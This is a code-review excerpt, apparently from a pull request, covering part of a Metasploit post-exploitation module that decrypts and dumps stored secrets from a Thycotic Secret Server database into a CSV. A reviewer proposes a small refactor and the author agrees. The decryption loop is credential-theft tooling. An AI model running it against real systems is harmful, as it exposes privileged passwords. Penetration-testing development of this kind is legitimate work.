modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb

```diff
@@ -0,0 +1,449 @@
+      secret_keyfield_hex = row['ItemKey'][2..]
+      secret_iv_hex = row['IV'][2..]
+      secret_field = [row['SecretFieldName'][2..]].pack('H*')
+      if secret_iv_hex == 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' # New-style: ItemKey and ItemIV are part of the key blob
+        miv_hex = secret_keyfield_hex[4..35]
+        key_hex = secret_keyfield_hex[100..]
+        iv_hex = secret_ciphertext_1[4..35]
+        value_1_hex = secret_ciphertext_1[100..]
+      else # Old-style: ItemKey and ItemIV are stored as columns
+        miv_hex = row['IvMEK'][2..]
+        key_hex = secret_keyfield_hex
+        iv_hex = secret_iv_hex
+        value_1_hex = secret_ciphertext_1
+      end
+      value_1 = [value_1_hex].pack('H*')
+      miv = [miv_hex].pack('H*')
+      key = [key_hex].pack('H*')
+      iv = [iv_hex].pack('H*')
+      if secret_encrypted == 1
+        secret_plaintext_1 = thycotic_secret_decrypt(secret_id: secret_id, secret_field: secret_field, secret_value: value_1, secret_key: key, secret_iv: iv, secret_miv: miv, secret_use256: secret_use256)
+        if secret_plaintext_1.nil?
+          vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue nil, excluding")
+          blank_rows += 1
+          next
+        end
+        # TODO: Figure out how ItemValue2 is encrypted; it does not match the structure of ItemValue.
+        # For now just return ciphertext if it exists.
+        secret_plaintext_2 = secret_ciphertext_2
+        if !secret_plaintext_1 || !secret_plaintext_2
+          print_error("SecretID #{secret_id} field #{secret_field} failed to decrypt")
+          vprint_error(row.to_s)
+          failed_rows += 1
+          next
+        end
+        secret_disposition = 'decrypted'
+        decrypted_rows += 1
+      else
+        secret_plaintext_1 = secret_ciphertext_1
+        if secret_plaintext_1.nil?
+          vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue nil, excluding")
+          blank_rows += 1
+          next
+        end
+        secret_plaintext_2 = secret_ciphertext_2
+        secret_disposition = 'plaintext'
+        plaintext_rows += 1
+      end
+      if !secret_plaintext_1.empty? && !secret_plaintext_2.empty?
+        result_line = [secret_id.to_s, secret_lastmod.to_s, secret_active.to_s, secret_type.to_s, secret_name.to_s, secret_field.to_s, secret_plaintext_1.to_s, secret_plaintext_2.to_s]
+        result_row = CSV.parse_line(CSV.generate_line(result_line).gsub("\r", ''))
+        result_csv << result_row
+        vprint_status("SecretID #{secret_id} field #{secret_field} ItemValue recovered: #{secret_disposition}")
+      else
+        vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue empty, excluding")
+        blank_rows += 1
+      end
+    end
+    @ss_processed_rows = current_row
+    @ss_blank_rows = blank_rows
+    @ss_decrypted_rows = decrypted_rows
+    @ss_plaintext_rows = plaintext_rows
+    @ss_failed_rows = failed_rows
+    result_csv
```

Comment:
I would prefer returning objects from the method instead of setting instance variables.
```suggestion
    {
      processed_rows: current_row,
      blank_rows: blank_rows,
      decrypted_rows: decrypted_rows,
      plaintext_rows: plaintext_rows,
      failed_rows: failed_rows,
      result_csv: result_csv
    }
```

Reply:
You know I can't believe I missed this, since all the vars in question are only being used in run. Definitely will do this!